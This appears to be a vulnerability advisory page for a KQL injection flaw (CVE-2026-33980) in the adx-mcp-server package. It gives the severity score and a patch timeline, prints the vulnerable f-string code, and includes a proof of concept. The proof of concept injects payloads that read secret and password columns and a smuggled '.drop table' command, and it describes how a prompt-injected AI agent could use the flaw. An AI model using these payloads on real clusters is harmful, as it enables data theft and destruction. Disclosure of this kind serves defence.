What is the CVSS score of EUVD-2026-16878?

EUVD-2026-16878 has a CVSS 3.1 base score of 8.3 (High). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L. EPSS exploitation probability: 0.0%.

Which versions of Python are affected by EUVD-2026-16878?

The adx-mcp-server Python package contains a Kusto query language injection vulnerability that allows authenticated users to execute arbitrary queries against Azure Data Explorer clusters,…. A patch is available.

How to fix or mitigate EUVD-2026-16878?

Within 24 hours: Identify all systems running adx-mcp-server and document current versions (check for versions ≤ commit 48b2933). Within 7 days: Apply vendor patch (commit 0abe0ee or later) to all affected systems; validate patch deployment in a test environment first. Within 30 days: Audit Azure Data Explorer access logs for suspicious Kusto queries executed through adx-mcp-server; review IAM permissions to ensure authenticated users have minimum necessary privileges for table access.

Python EUVD-2026-16878

| CVE-2026-33980 HIGH

Improper Neutralization of Special Elements in Data Query Logic (CWE-943)

2026-03-27 https://github.com/pab1it0/adx-mcp-server

GHSA-vphc-468g-8rfp

RCE Python Microsoft Nosql Injection

8.3

CVSS 3.1

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

Low

Lifecycle Timeline

Re-analysis Queued

Apr 22, 2026 - 14:52 vuln.today

cvss_changed

EUVD ID Assigned

Mar 27, 2026 - 19:30 euvd

EUVD-2026-16878

Analysis Generated

Mar 27, 2026 - 19:30 vuln.today

Patch released

Mar 27, 2026 - 19:30 nvd

Patch available

CVE Published

Mar 27, 2026 - 19:08 nvd

HIGH 8.3

DescriptionNVD

Summary

adx-mcp-server (<= latest, commit 48b2933) contains KQL (Kusto Query Language) injection vulnerabilities in three MCP tool handlers: get_table_schema, sample_table_data, and get_table_details. The table_name parameter is interpolated directly into KQL queries via f-strings without any validation or sanitization, allowing an attacker (or a prompt-injected AI agent) to execute arbitrary KQL queries against the Azure Data Explorer cluster.

Details

The MCP tools construct KQL queries by directly embedding the table_name parameter into query strings:

Vulnerable code (permalink):

python

@mcp.tool(...)
async def get_table_schema(table_name: str) -> List[Dict[str, Any]]:
    client = get_kusto_client()
    query = f"{table_name} | getschema"
# <-- KQL injection
    result_set = client.execute(config.database, query)

python

@mcp.tool(...)
async def sample_table_data(table_name: str, sample_size: int = 10) -> List[Dict[str, Any]]:
    client = get_kusto_client()
    query = f"{table_name} | sample {sample_size}"
# <-- KQL injection
    result_set = client.execute(config.database, query)

python

@mcp.tool(...)
async def get_table_details(table_name: str) -> List[Dict[str, Any]]:
    client = get_kusto_client()
    query = f".show table {table_name} details"
# <-- KQL injection
    result_set = client.execute(config.database, query)

KQL allows chaining query operators with | and executing management commands prefixed with .. An attacker can inject:

sensitive_table | project Secret, Password | take 100 // to read arbitrary tables
Newline-separated management commands like .drop table important_data via get_table_details
Arbitrary KQL analytics queries via any of the three tools

Note: While the server also has an execute_query tool that accepts raw KQL by design, the three vulnerable tools are presented as safe metadata-inspection tools. MCP clients may grant automatic access to "safe" tools while requiring confirmation for execute_query. The injection bypasses this trust boundary.

PoC

python

# PoC: KQL Injection via get_table_schema tool
# The table_name parameter is injected into: f"{table_name} | getschema"

import json
# MCP tool call that exfiltrates data from a sensitive table
tool_call = {
    "name": "get_table_schema",
    "arguments": {
        "table_name": "sensitive_data | project Secret, Password | take 100 //"
    }
}
print(json.dumps(tool_call, indent=2))
# Resulting KQL: "sensitive_data | project Secret, Password | take 100 // | getschema"
# The // comments out "| getschema", executing an arbitrary data query instead
# Destructive example via get_table_details:
tool_call_destructive = {
    "name": "get_table_details",
    "arguments": {
        "table_name": "users details\n.drop table critical_data"
    }
}
# Resulting KQL:
#   .show table users details
#   .drop table critical_data details

AnalysisAI

KQL injection in adx-mcp-server Python package allows authenticated attackers to execute arbitrary Kusto queries against Azure Data Explorer clusters. Three MCP tool handlers (get_table_schema, sample_table_data, get_table_details) unsafely interpolate the table_name parameter into query strings via f-strings, enabling data exfiltration from arbitrary tables, execution of management commands, and potential table drops. …

RemediationAI

Within 24 hours: Identify all systems running adx-mcp-server and document current versions (check for versions ≤ commit 48b2933). Within 7 days: Apply vendor patch (commit 0abe0ee or later) to all affected systems; validate patch deployment in a test environment first. …

Analysis

Detailed AI-generated intelligence summary covering attack vector, impact assessment, affected versions, remediation steps, and indicators of compromise.

POChttps://••••••••••.com/exploit

PATCHhttps://••••••••••.com/patch

ADVISORYhttps://••••••••••.com/advisory